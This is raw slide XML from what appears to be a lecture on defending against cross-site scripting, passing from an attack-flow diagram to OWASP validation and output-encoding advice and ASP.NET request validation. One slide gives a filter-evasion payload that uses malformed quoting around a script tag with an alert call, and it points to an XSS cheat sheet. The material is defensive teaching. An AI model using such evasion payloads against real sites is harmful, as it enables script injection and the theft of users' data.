              <a:t>Continuous testing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Bad ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Blacklisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Manual sanitization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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4038600"/>
            <a:ext cx="3352800" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="32941"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Defenses at server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601914"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38917" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979989"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38918" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38919" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943601" y="1524000"/>
            <a:ext cx="1426160" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38920" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552949"/>
            <a:ext cx="1487780" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38921" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="3886200"/>
            <a:ext cx="1266693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38923" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3097303" y="1748908"/>
            <a:ext cx="1399999" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38924" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38925" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2724333" y="2285484"/>
            <a:ext cx="2306272" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38926" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38927" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049590" y="4085708"/>
            <a:ext cx="1654175" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38928" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319340" y="4536559"/>
            <a:ext cx="2638425" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38929" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1949451"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38930" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209802" y="260667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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38931" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714627" y="3705226"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38932" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324349"/>
            <a:ext cx="3352800" cy="1162051"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38933" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38934" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3028295" y="2764908"/>
            <a:ext cx="1941237" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38935" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514602" y="30480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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38936" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028827" y="4006851"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>How to Protect Yourself (OWASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The best way to protect against XSS attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Validates all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what should be allowed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types of active content and too many ways of encoding it to get around filters for such content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Adopt a ‘positive’ security policy that specifies what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete.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Input data validation and filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Never trust client-side data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Best: allow only what you expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Remove/encode special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Many encodings, special chars!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>E.g., long (non-standard) UTF-8 encodings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>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Output filtering / encoding</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sz="2400" dirty="0" smtClean="0"/>
              <a:t>Remove / encode (X)HTML special chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &lt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &gt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> for “ …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Allow only safe commands (e.g., no &lt;script&gt;…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: `filter evasion` tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>See XSS Cheat Sheet for filter evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>E.g., if filter allows quoting (of &lt;script&gt; etc.), use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    malformed quoting: &lt;IMG “””&gt;&lt;SCRIPT&gt;alert(“XSS”)…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Or: (long) UTF-8 encode, or…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: Scripts not only in &lt;script&gt;!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Examples in a few slides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ASP.NET output filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1295400"/>
            <a:ext cx="8610600" cy="4648200"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>validateRequest:    (on by default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Crashes page if finds  &lt;script&gt;  in POST data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Looks for hardcoded list of patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Can be disabled: &lt;%@  Page  validateRequest=“false"  %&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2936877" y="2971800"/>
            <a:ext cx="5978525" cy="3748088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="me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sz="3600" smtClean="0"/>
              <a:t>Caution: Scripts not only in &lt;script&gt;!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
